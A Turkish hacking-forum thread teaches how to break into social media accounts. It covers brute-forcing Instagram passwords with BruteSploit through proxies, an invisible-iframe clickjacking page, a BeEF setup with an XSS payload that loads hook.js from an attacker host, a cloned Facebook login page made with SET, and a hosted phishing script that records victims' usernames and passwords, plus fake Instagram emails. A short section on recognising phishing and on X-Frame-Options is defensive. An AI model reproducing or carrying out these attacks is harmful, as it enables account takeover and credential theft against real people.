İPUCU

Mail Güvenliği İstenmeyen e-postaları, kötü amaçlı yazılımları, kimlik avı girişimlerini ve gelişmiş hedefe yönelik saldırıları hakkında birçok bilgiye bu sayfamızdan ulaşabilirsiniz.

Seçenekler

Sosyal Medya Hack Konusu

19-07-2018 00:26
#1
Üyelik tarihi:
12/2017
Nereden:
Türkiye
Mesajlar:
491
Teşekkür (Etti):
138
Teşekkür (Aldı):
39
Konular:
72
Ticaret:
(0) %
İMDİ ÖNCELİKLE SİZLERE TÜM SONUÇLARIYLA BİRLİKTE ANLATACAĞIM LÜTFEN DİKKATLE ÖRNEKLERLE BAKINIZ AMA TAM TEMELİ ANLATMAYACAĞIM YOL HARİTASI ÜZERİNE ONDAN SONRASI GİRİŞİMCİLİK SİZLERE KALMIŞTIR !

İnstagram Brute Force Yöntemi İle Hesap Hack:
Bu işlemi brute force (kaba kuvvet) saldırısı ile yapacağız. Bu saldırı yönteminde hedef hesaba parola denemeleri yaparak hedef hesabın şifresini ele geçireceğiz. Bu işlemleri Linux sistemler için yazılmış Brutesploit toolunu kullanarak yapacağız. Brutesploit aracında bir çok kullanım modülü var. Biz instagram brute force modülünü kullanacağız.

Brutesploit Aracının Kurulumu:
Brutesploit aracı linux sistemlerde kurulu gelmiyor. Bundan dolayı kendimiz indirip kuracağız. Aşağıdaki komutları sırası ile terminale yazarak Brutesploit aracını indirip kuruyoruz.

cd Masaüstü/
git clone https://github.com/Screetsec/BruteSploit
cd BruteSploit
chmod +x Brutesploit
./Brutesploit

[​IMG]

Bu komutları yazarak aracımızı açıyoruz. Aracın içinde bulunan modülleri görmek için show modulesyazıyoruz.

[​IMG]

Bizim kullanacağımız modül wordlist/attackBu modülü çalıştırmak için list 0e yazıyoruz.

[​IMG]

Bundan sonra use 0e4 komutunu giriyoruz.

[​IMG]

Show options yazarak nelere gerek olduğunu bakıyoruz.

[​IMG]

Burada hedef hesabın bilgilerini giriyoruz. Username yazan yere hesabın kullanıcı adını, wordlist yazan yere hedef hesaba denenecek şifreler listesini giriyoruz, proxy yazan yere şifre denemelerini yaparken hesabın ban yememesi için proxy kullanmamız gerek. Oraya da proxy listesi giriyoruz. Thread yazan yere de 4 yazıyoruz.

[​IMG]

Bundan sonra run yazıyoruz ve saldırı başlıyor.

[​IMG]

Şifreyi kırarsa bize veriyor.
2.

Clickjacking (UI REDRESSING) Saldırıları
Clickjacking saldırıları, bir çok kişiye ilk bakışta önemsiz gibi gözükse de sosyal mühendislik yöntemleriyle birleştirildiğinde etkili bir yöntem olabilmektedir. Facebook ve Twitter gibi ünlü sosyal ağlar için görünen örnekleri, clickjacking’in öneminin/etkisini ispatlamıştır.

Clickjacking Nedir?
Clickjacking yönteminin altında yatan temel mantık, hedef sistemi görünmez(opacity değeri sıfır olan) bir iframe nesnesine yükleyip, yüklenen sayfada kurbanın tıklaması istenen linklerin üzerine ilgisini çekecek tuzak linkler(veya başka html nesneleri) ekleyerek kurbanın farkında olmadan iframe içindeki linkle tıklamasını sağlamak olarak söylenebilir. Linke kullanıcının tıklamasının getirisi, hedef sistemdeki işlemin kullanıcının yetkileriyle yapılacak olmasıdır.
Örnek Uygulama

Örnek olarak, tuzak sayfaya giren veya yönlendirilen bir kullanıcının “IPad Kazandınız!” linkine tıkladığını düşünürken bga.com.tr’deki hakkımızda linkine tıkladığı bir clickjacking sayfası hazırlanmıştır.


İlk adımda sadece ayyildiz.org sayfasını iframe nesnesine yükleyen bir sayfa oluşturulur.


<html>
<head>
<**** charset=”utf-8″ />
<title> Tuzak Sayfa </title>
</head>
<body>
<iframe src=”ayyildiz.org /”></iframe>
</body>
</html>


İkinci adımda body tagları arasına, içinde z-index değeri -1 olan “IPad Kazandınız!” linki bulunan bir div eklenir.


<div><a href=”#” target=”_blank” style=”position:relative;z-index:-1″>IPad Kazandınız!</a></div>


Son adımda iframein şeffaflık değeri ve divin pozisyonu ayarlanır. Bunun için şu css kullanılmıştır. (head tagları arasına eklenmiştir)


*********
iframe {
width:100%;
height:100%;
position:absolute;
top:0; left:0;
filter:alpha(opacity=0.0);
opacity:0.0;
}


div {
position:absolute;
top:113px;
right:240px;
}
</style>


Pozisyonu ayarlama aşamasında opacity değeri 0.5 gibi görülebilir bir değer yapılarak çalışılabilir.


Son hali
Önlemler
Clickjackinge karşı javascript kullanılarak geliştirilmiş önlemler olsa da bunlar genellikle atlatılabilmektedir. Bu yüzden en geçerli çözüm, http X-Frame-Options değerini “sameorigin” gibi sayfanın farklı bir sistemdeki iframede çalışmasını engelleyecek bir değer vermek olacaktır.


JS frame engelleme örneği(Atlatılabilir):
<script type=“text/javascript”>
if(top != window)
top.********=window.********
</script>


X-Frame-Options
Head taglarının arasına
<**** http-equiv=”X-Frame-Options” content=”SAMEORIGIN”>
eklenerek aktif edilebilir.


Sadece aynı domaindeki framelere izin veren “SAMEORIGIN” değerine alternatif olarak sadece belli URI’daki framelere izin veren “ALLOW-FROM uri” veya hiçbir framee izin vermeyen “DENY” değerleri de duruma göre kullanılabilir.
Son olarak, büyük uygulamalarda her sayfa için **** tagını eklemek yerine web sunucusunu tüm sayfalar için X-Frame-Options değerini atayacak şekilde ayarlamak daha makul bir çözüm olabilir.

BeEF Framework Nedir?
[​IMG]
BeEF, The Browser Exploitation Framework'in kısaltmasıdır. Web tarayıcısına odaklanan bir penetrasyon test aracıdır.

Mobil istemciler de dahil olmak üzere müşterilere yönelik web tabanlı saldırılarla ilgili endişeler arttıkça, BeEF, profesyonel penetrasyon test cihazının istemci taraflı saldırı vektörlerini kullanarak gerçek bir hedef güvenlik ortamını değerlendirebilmesini sağlar. BeEF, bir veya daha fazla web tarayıcısını kendine bağlayarak ve bunları yönlendirilmiş komut modüllerini başlatmak ve tarayıcı bağlamında sisteme karşı daha fazla saldırı başlatmak için ana sunucu olarak kullanacaktır.

Mimarisi ve Çalışma Mantığı
BeEF’in mimarisi kabaca aşağıdaki görseldeki gibidir.

[​IMG]
Yukarıdaki görseli açıklayacak olursak; BeEF 3 katmandan oluşmaktadır.

Saldırgan veya Saldırganların kişisel bilgisayarları
BeEF’in kurulu olduğu master server
Kurbanlar
Bir şekilde BeEF’in ağına dahil olmuş kurbanlar sürekli bilgilerini BeEF’in kurulu olduğu ana sunucuya gönderirler. Saldırgan kendi IP adreslerini BeEF’in konfigürasyon dosyasından web arayüzüne girme izni verecek şekilde yapılandırdıktan sonra ana sunucunun web paneline kullanıcı adı ve parola ile erişim sağlarlar. Kurbanların tüm bilgileri sürekli ana sunucuya iletildiğinden saldırgan tüm kurbanların bilgilerine web arayüzü üzerinden ulaşabilecek.

Yani her bir kurban ile sadırgan arasındaki yapı aşağıdaki görseldeki gibi olacaktır.

[​IMG]
Kurulum
Eğer Kali Linux kullanıyorsanız bu adımı doğrudan geçebilirsiniz çünkü BeEF, Kali Linux içerisinde zaten kurulu olarak geliyor. Kali Linux kullanmıyor iseniz aşağıdaki bağlantıdan kendi işletim sisteminize BeEF’i nasıl kurabileceğinizi öğrenebilirsiniz.

BeEF Kurulum: https://github.com/beefproject/beef/wiki/Installation

Konfigürasyon
BeEF’in konfigürasyon dosyası default olarak /etc/beef-xss dizinindeki config.yaml dosyasıdır. /etc/beef-xss/config.yaml dosyasını herhangi bir metin editörü ile açıp aşağıdaki adımlara göre konfigürasyon yapmalısınız.

Web Arayüz Ağ Kısıtlamaları
restrictions:
permitted_hooking_subnet: "0.0.0.0/0"
permitted_ui_subnet: "127.0.0.1/32"
permitted_hooking_subnet: Bu değişken, hangi subnetten BeEF’in arayüzüne hook yapılabileceğini belirler. Bu ayar, BeEF’in kurbanlara ulaşması için önemlidir.

permitted_ui_subnet: Bu değişken, hangi subnetten BeEF’in web arayüzüne giriş yapılabileceğini belirler. Bu ayar saldırganın web arayüz paneline ulaşması için önemlidir.

Web Sunucusu
http:
debug: false
host: "0.0.0.0"
port: "3000"

# Proxy
public: "8.7.6.5"
public_port: "3000"

# Domain Name Server
dns_host: "localhost"
dns_port: 53

# Web Admin Interface
web_ui_basepath: "/ui"

# Hook
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION"
debug: Oluşacak hataların detaylı olarak çıktıları alınmak isteniyorsa bu değişken true olarak ayarlanmalıdır.

host: BeEF’in kurulu olduğu master server’ın IP adresi girilmelidir.

port: BeEF’in ayağa kaldırılacağı port. 3000 gibi popüler uygulamalar tarafından kullanılmayan bir port seçmek mantıklı olacaktır. Zira 80, 22 gibi portlar seçilirse sunucuda o portu kullanan diğer hizmetler ile çakıştığından sıkıntı yaşanacaktır.

public ve public_port değişkenleri ise varsa bir vekil sunucu girilmesi içindir. Bu değişkenlerin set edilmesi zorunlu değildir.

dns_host ve dns_port değişkenleri adından da anlaşılacağı üzere DNS host ve portunu girmemiz gereken değişkenlerdir.

web_ui_basepath değişkeni, BeEF’in admin arayüzünün görüüntülenmesi istenen path değişkenidir.

hook_file: XSS zafiyeti bulunan hedefe entegre edilmesi gereken uzak JavaScript dosyasının yoludur.

Veri Tabanı
BeEF öntanımlı olarak SQLite kullanır ve veritabanı dosyası şuradadır: /var/lib/beef-xss/beef.db. Ancak MySQL ve PostgreSQL’de desteklenmektedir. Aşağıdaki ayarlardan dilerseniz veritabanını değiştirebilirsiniz.

Dikkat edilmesi gereken bir nokta var; eğer Sqlite dışındaki seçeneklerden biri kullanılacak ise kullanılacak veritabanının adaptörü Gemile yüklenmelidir.

Adımlar;
BeEF’in kurulu olduğu dizine geçmek; cd /usr/share/beef-xss
MySQL adaptörünün kurulumu; gem install "dm-mysql-adapter"
PostgreSQL adaptörünün kurulumu; gem install "dm-postgres-adapter"
database:
driver: "sqlite"

db_file: "db/beef.db"

db_host: "localhost"
db_port: 3306
db_name: "beef"
db_user: "beef"
db_passwd: "beef"
db_encoding: "UTF-8"
driver: Kullanılması istenilen veritabanı girilmelidir. Girilebilir değerler: sqlite, mysql, postgres

db_file: Eğer driver Sqlite seçilmiş ise veritabanı olarak kullanılacak dosyanın yolu.

Diğer değişkenler ise eğer MySQL veya PostgreSQL seçilmiş ise bağlantı için gereken değerlerin girilmesi içindir. Eğer drive sqlite seçilmiş ise bu değerler boş bırakılabilir.

Yetkilendirme
BeEF’in web admin arayüzüne girmek için gerekli kullanıcı adı ve parola bu bölümde tanımlanır.

credentials:
user: "beef"
passwd: "beef"
BeEF’i Çalıştırmak
Bir önceki bölümde gerekli konfigürasyonu yaptıktan sonra BeEF’i ayağa kaldırmamız gerekiyor. Bunun birçok yolu var.

Eğer Kali Linux kullanıyorsanız “Applications > Exploitation” menüzü altındaki “beef xss framework” uygulamasına tıklamanız yeterli. Gerekli servisleri başlatıp browser’da admin arayüzünü açacaktır.
Kurulumu manuel olarak farklı bir sunucuya yaptıysanız 2 farklı şekilde çalıştırabilirsiniz.
BeEF servisini start ederek,
BeEF’in Ruby dosyasını çalıştırarak
Kurulumu manuel olarak farklı bir sunucuya yaptıysanız tavsiyem 2. yöntem ile çalıştırmanızdır. BeEF’in Ruby dosyasından çalıştırmak için yapmanız gerekenler;

BeEF’in kurulu olduğunuz dizine geçmek; cd /usr/share/beef-xs
BeEF’i çalıştırmak için; ./beef
XSS Zafiyeti ile BeEF Hook Dosyasını Tetiklemek
Kurulumdan sonra hook dosyanıza aşağıdaki şemadan ulaşabilirsiniz;

http://{host}:{port}{hook_file} yani http://1.2.3.4:3000/hook.js
Hook dosyasının içerisinde kurbanı BeEF’in ağına düşürecek zararlı JavaScript kodu bulunmaktadır. XSS zafiyeti bulunan sistemde bir şekilde hook dosyası çağrılır ve kurban tarafından tetikletilir ise kurban BeEF’in ağına düşmüş olacaktır.

Örnek olarak aşağıdaki adresde Reflected XSS olduğunu varsayalım;

http://testsparker.com/ara.php?k=deneme
Buradaki XSS zafiyetine aşağıdaki şekilde hook dosyasını çağırtabiliriz;

http://testsparker.com/ara.php?k=<script src="http://1.2.3.4:3000/hook.js"></script>
Web Admin Arayüzü
Web admin arayüzüne yukarıda yapılan ayarlar sonucunda şu şemadan ulaşılabilir;

http://{host}:{port}{web_ui_basepath}/panel
Web admin arayüzü açıldığında ilk olarak aşağıdaki görseldeki gibi pencere ile karılaşılacaktır;

[​IMG]
Burada dikkat etmemiz gereken noktalardan biri “Each command module has a traffic light icon, which is used to indicate the following” bölümü. Bu bölümdeki renklendirmelere bu yazının “Web Admin Arayüzü > Commands” bölümünde ihtiyacımız olacak.

[​IMG]
Yeşil: Komut zombi browserda çalıştırılabilir ve kurbanın bundan haberi olmaz.
Turuncu: Komut zombi browserda çalıştırılabilir ama kurbanın haberi olabilir.
Beyaz: Komutun çalıştırılabilme durumu henüz tespit edilemedi.
Kırmızı: Komut zombi üzerinde çalıştırılamaz.
Sol taraftaki pencerede hook dosyasından bir şekilde etkinlenmiş kurbanların IP adresleri bulunuyor. Sağ taraftaki pencerede ise sizi karşılayan bir Home sayfası ve deaktif şekilde bir Logs penceresi bulunuyor.

Sol taraftaki penceren online olan zombinin üstüne tıklandığında sağ taraftaki pencerede “Current Browser” adında bir sekme aktif olacaktır. O kurban ile ilgili işlemler o sekme üzerinden yapılacaktır.

Bu sekme içerisinde 8 tane sekme var. Bu sekmelerden en önemli olanları ve açıklamaları aşağıdaki gibidir;

1. Detail
Zombinin sistemi hakkında bilgilerin olduğu sekmedir.

[​IMG]
2. Logs
Zombi browser üzerinde yapılmış işlemlerin zaman damgalı şekilde loglarının olduğu sekmedir.

[​IMG]
3. Commands
Zombi browser üzerinde komut çalıştırabileceğimiz sekmedir.

[​IMG]
Yukarıdaki görselde göründüğü üzere “Module Tree” diye bir sekme var ve yapılabilecek tüm işlemler bu sekme içerisinde yer alıyor. Örnek olarak zombi browser’a bir JavaScript alert’i şu şekilde verebiliriz.

Browser > Hooked Domain > Create Alert Dialog sayfasına gidip kurban browsera istediğimiz mesajı alert olarak verdirebiliriz.

[​IMG]
4. Rider
Zombi browser üzerinden request gönderebileceğimiz sekmedir. “Forge Request” sekmesinden request yapabilir, yapılan requestleri “History” sekmesinden görüntüleyebilirsiniz.

[​IMG][​IMG]
5. Network
Zombi ile saldırgan arasındaki ağ bağlantısının görselleştirilmiş halinin olduğu sekmedir.

[​IMG]


Phishing Nedir? Phishing Saldırısı ve Phishing Yapma


Phishing, bireysel olarak veya grup olarak yapılan, bir kişi veya kişileri aldatarak kişilerin bilgilerini ele geçirme yöntemidir.



Phishing Saldırısı
Phishing saldırıları bir kişi veya bir grup tarafından yapılır. Saldırı bazen tek bir bireyi hedef alırken bazen rastgele olarak da gerçekleştirilebilir. Phishing saldırılarında genellikle kişiyi tuzağa düşürmek için bir e-mail veya web sayfası hazırlanır. Bu mail ve web sayfaları aracılığıyla kişilere ait online banka hesapları, kredi kartı bilgileri veya diğer değerli giriş bilgileri ele geçirilmeye çalışılır. Bu mailler ve özel olarak tasarlanan web siteleri daima içerisinde kandırmaya yönelik ögeler barındırır ve mümkün olduğunca kişilere ait kişisel bilgiler (İsim soy isim en yaygın olanıdır) kullanılır.

Bir Phishing Saldırısı Nasıl Analaşılır?

Şirket/Kurum: Bu saldırı tipinde genellikle yüzlerce mail aynı anda hedef gözetmeksizin gönderilir ve maili gönderen kişiler sizin hakkınızda herhangi bir bilgi sahibi değildir. Tek bildikleri şey sizin bu şirket veya kurum ile bir bağınızın olduğu veya olabileceğidir. Eğer mailinize buna benzer bir şirket veya kurum tarafından mail gönderiliyorsa bunun bir Phishing saldırısı olduğunu anlayabilirsiniz.

Gramer/Dil Kuralları: Phishing saldırılarında üst düzey bir gramer ve dil kuralı görülmez. Oysa gerçek kurum ve şirketler bu konuya büyük önem gösterir ve imkanları varsa bu metinleri yetenekli kişilere yazdırır.

Hiçbir Şirket İstemez: Mail veya web sitelerine yönlendirerek sizden bir hesaba giriş yapmanızı resmi hiçbir şirket veya firma talep etmez. Böyle bir mail veya linkle karşılaştığınızda bunun bir Phishing saldırısı olduğunu anlayabilirsiniz.

Belirgin ifadeler: Gönderilen e-mailler içerisinde mutlaka kullanıcı psikolojik baskı ve tedirginlik altında bırakılmak istenir. Bu nedenle söylenen işlemi 24 saat içerisinde yapmalısınız gibi belirgin ifadelere yer verilir.

Linkler: Yeni bilgisayar kullanıcıları ve online tehditlere karşı bilgisiz olan kullanıcılar linklerin alan adına ve SSLsertifikasına dikkat etmezler. Genellikle mail içerisinde size sunulan linkler asıl servisin benzeri bir linktir. Örneğin eBayile yapılan Phishing saldırılarında ebay-account.com gibi linkler tercih edilir. Bu sitelerin tasarımları da bire bir asıl servise benzetilir.

Gelen Mail'in Phishing mi Gerçek mi Olduğu Nasıl Anlaşılır?

Elinize bir mail geldi ve bu mailin Phishing saldırısı olup olmadığı merak ediyorsunuz. Bu durumda yapmanız gerekenler aşağıdaki adımları takip etmektir.

Linklere asla tıklamayın: Gelen mailin Phishing olup olmamasını göz ardı edin ve mail içerisinde yer alan hiçbir linke tıklamayın. Eğer bunun gerçek bir bildiri olabileceğini düşünüyorsanız doğrudan web sitesini ziyaret ederek bu konuda hakkında size bir bildirim ulaşıp ulaşmadığını kontrol edin.

Hiçbir Kişisel Bilginizi Göndermeyin: Şartlar ne olursa olsun hiçbir banka veya internet sitesi sizden şifrenizi veya diğer kişisel bilgilerinizi mail aracılığıyla talep etmez. Bu nedenle kesinlikle kişisel bilgilerinizi mail ile göndermeyi düşünmeyin.

Tüm bunlara rağmen durumu hala şüpheli buluyorsanız hiçbir işlem yapmadan önce firmayı doğrudan arayarak elinize ulaşan maili gönderip göndermediklerini sorun.

[​IMG]

Phishing Yapma
Phishing saldırılarını her yeni çekilen film gibi düşünün. Bir kısmı daha önceden izlediğiniz filmlere benzerken bir kısmı gerçekten benzersiz filmler olabilir. Bu durum tamamıyla Phishing saldırısını yapmakta olan kişilerin hayal gücüne bağlıdır. Phishing saldırısı maille yapıldığında senaryolar çoğu zaman benzerdir;

Hesap Problemleri: Hesabınızın kullanım tarihinin dolmuş olması, hesabınızın geçici olarak askıya alındığı gibi problemlerin asıl konu olduğu mailler gönderilir. Bu maillerde kullanıcının doğrudan şifresi maille istenebileceği gibi sahte bir şifre sıfırlama sayfası aracılığıyla da kullanıcının şifresi ele geçirilebilir.

Kredi Kartı veya Diğer Bilgiler: Kredi kartı bilgilerindeki hatalar veya kredi kartınızın internet korsanları tarafından kullanılmasıyla ilgili benzer senaryolar oluşturulur. Bazen kart bilgileri bazen de kullanıcının diğer bilgileri istenebilir.

Kazanılan Çekilişi Onaylama: Hiç katılmadığınız bir çekilişten kazandığınız para veya ürünle ilgili senaryolardır. Kişisel bilgileriniz veya kredi kartı bilgilerinizi ele geçirmek için yapılır.

En çok Phishing Saldırısının Yapıldığı Alanlar:

- Herhangi bir Banka

- Popüler web siteleri; Facebook, Twitter, PayPal, eBay, Hotmail, YouTube vb.

- Resmi Kurumlar: Polis, Gizli Polisler, Terör Birimleri




Social Engineering Toolkit(SET)

İçeriklerimiz Neler ;
-SET Nedir ?
-Ne Amaçla Kullanılır ?
-SET Ekranında Bulunan Komutlar Ne işe Yarar ?
-Örnek Saldırı

[​IMG]

SET Nedir ?

SET(Social Engineering Toolkit) Farklı Şekillerde Saldırı Yapabileceğimiz Saldırı Aracıdır.Ayrıca Sadece Kali Linuxta Bulunmuyor.Back Tracktede Bulunan Bir Tooldur.Bu Tool Bize Çok Avantaj Sağlar.Sosyal Mühendislik Kullanılarak Yapılan Saldırılar Olduğu için Bu Tool’a Social Engineering Toolkit Adı Verilmiştir.

[​IMG]

Social Engineering Toolkit için Gerekli Kurulumlar ;

-Git
-m e t a sploit
-Ettercap
-openjdk
-Apache

[​IMG]

Yükleme Komutumuz ;

* sudo apt-install git
* sudo apt-get install ettercap
* sudo apt-get install openjdk-6-jdk
* sudo apt-get install apache2

[​IMG]

SET Ne Amaçla Kullanılır ?


SET Toolu’nun Bir Çok Avantajı Vardır Bizim için Power Shell Gibi Web Attack Gibi Bir Çok Özellikli Saldırılar için Kullanılır.

[​IMG]

SET Komutları ve Yüklenecek Araçlar


1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the m e t a sploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About

[​IMG]

Social Engineering Attacks

Sosyal Mühendislik Saldırıları Olarak Çevirirsek Ne Amaçla
Kullanılan Bölüm Olduğunu Anlarsınız Zaten Sosyal Mühendisliğe Dayalı Saldırılar bu Bölüm Altında Toplanmış Bulunuyor.

[​IMG]

Fast-Track Penetration Testing(penetrasyon testi)

Penetrasyon testi yani pentest firmaların kendi ağ yapılarına kullandıkları uygulama ve sistemlere sızma testleri uygulanmasıdır Burdaki amaç firma içindeki güvenlik durumunun tespit edilmesi tespit edilen açıkların raporlanıp yetkili kişilere bildirilmesi ve bu sayede dışardan gelebilcek herhangi bir tehdite karşı gerekli önlemlerin alınmasıdır.

[​IMG]

Third Party Modules

Uzaktan Yönetim Aracıdır.ip adresi ile port adresi kullanarak Uzaktan Kontrol altına almak.

Update the m e t a sploit Framework Kurulumu
“msfupdate” komutunu kullanarak yükleyebilirsiniz.

Update the Social Engineering toolkit(SET güncellemeleri)


update etme kısmı basit ve Kullanışlıdır Son Gücelleştirmeler Buradan Update edilir.
Tek yapmak gereken SET Menusünden “Update the Social Engineering Toolkit”
Yani 4 Yazıp Devam Etmek.

[​IMG]

Update SET Configuration

SET Kısmının Güncelleme Kümesi Burada Yer Alır.

[​IMG]

Help, Credits, and About(Yardım ve Krediler Hakkında)


Burada Kullanım Hakları Yardım Kısmı Kurallar Yer Almaktadır.
“SET menusünden 6 ile okuyabilirsiniz bilgilenebilirsiniz




SET Örnek Saldırı

Exploitation Tools -> Social Engineering Toolkit
Bu Yolları İzleyerek Toolumuzu Açıyoruz.



SET tooluna Girdikten Hemen Sonra Bizden izin istiyor. Y Yazıp Giriyoruz.


Ve Şuanda SET Panelindeyiz Ekranımıza Saldırı Ekranı Geliyor.Ben Buradan Sosyal Mühendislik Facebook Atak Yapacağım O yüzden 1 Yazıp Devam Ediyorum.



website atak yapacağım Çünkü bir site üzerinden gidiyoruz 2 yazıp devam ediyorum.



web jacking atak 5 yazıp Devam Edeceğiz



Saldırımız Site Üzerinden Devam Ediyor.Site Cloner 2 Yazıp Devam Ediyoruz.




Arkadaşlar Bizden ip Adresimiz isteniyor.Saldırıya Devam Etmek için Yeni Bir Terminal Açıp “ifconfig” komutumu giriyorum.
ve işaretlediğim yerdeki ip adresimizi Kopyalıyoruz.


Evet Şimdi Bizden Kullanacağımız sitenin urlsini istiyor.
Hemen yazıp devam Ediyoruz. “facebook.com”


Evet Atak şuandan itibaren Başlamış Durumda.Saldırımız Başladı.


Kali linuxtan Tarayıcımıza Giriş Yapıyoruz.
URL Kısmına Aldığımız ip Adresini Yazıyoruz
“192.168.177.128”
ve Karşımıza Facebook Giriş Sayfamız Çıkıyor.giriş yapıyoruz.


Google Faxe Sosyal medya scriptleri aratıyorsunu z şimdi reklam olmasın sonra.com go---- alan adı hostin alıcaksınız ardından ise scriptinizi ftp yolu ile yani fillezillaaracı ile kurulumunu yapacaksınız. kişi gidiği anda saat ipadress username password şeklinde .txt yada hangi uzantı ile şifreleri kaydetiyseniz çıkar.


Instagram Mail Sender- Instagram Gibi Mail Gönderme (html)
[​IMG]

Alıntı:
blackhat007´isimli üyeden Alıntı [​IMG]
merhabalar
[​IMG] Resim yeniden boyutlandırıldı, orjinalini görmek için tıklayın.
[​IMG]
bu şekilde mail nasıl atabilirim
atılıyor ama nasıl oldugunu bilmiyorum
Neyse ben fazla uğraşmamak için z-shadown ile yaptım siz kendiniz fake script kurup yapabilirsiniz.

İlk olarak bir gmail veya autlook hesabı açıyoruz.

E-POSTA yaz a tıklayarak yeni bir e posta yazıyoruz

[​IMG]

Alıntı:
Not: Resimleri Konunun Aşağısında Vericem.
Metnimizi yazdıktan sonra E posta onayla resmini sol tık ile seçiyoruz.


[​IMG]

seçtikten sonra ctrl+k ile bağlantı ekliyoruz.


[​IMG]

ikinci yere siteniz dan alığımız linki yapıştırıp Tamama basıyoruz.

Kutuya tıkladığımızda altında resimdeki gibi yazı çıkmazsa linki farklıysa değiştire basıp değiştrebilirsiniz.

[​IMG]

ve son olarak göndere basmak kalıyor [​IMG]

[​IMG]
Kullanıcı İmzası
Eğer kendilerini tanımış olsaydınız, TÜRKLERE hayran olurdunuz.
bluesigner Teşekkür etti.

26-07-2018 16:49
#2
Üyelik tarihi:
08/2017
Mesajlar:
272
Teşekkür (Etti):
12
Teşekkür (Aldı):
16
Konular:
25
Ticaret:
(0) %
yararlı paylaşım saolun da resim ekleseydiniz güzel olurdu kafa karıştırıyor
Kullanıcı İmzası
DarkWord...

Name: Salvador namı değer suskun.
Konu powwerbangTR tarafından (26-07-2018 16:55 Saat 16:55 ) değiştirilmiştir.
26-07-2018 17:13
#3
THE_ORDER - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2017
Nereden:
Sanal Dünya
Mesajlar:
882
Teşekkür (Etti):
14
Teşekkür (Aldı):
256
Konular:
44
Ticaret:
(0) %
Elinize sağlık fakat konuyu renklendirirseniz daha çok dikkat çekersiniz
Kullanıcı İmzası
İnananlardan emir alan değil,

İnsanlara emir veren olacaksın.

THE_ORDER

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı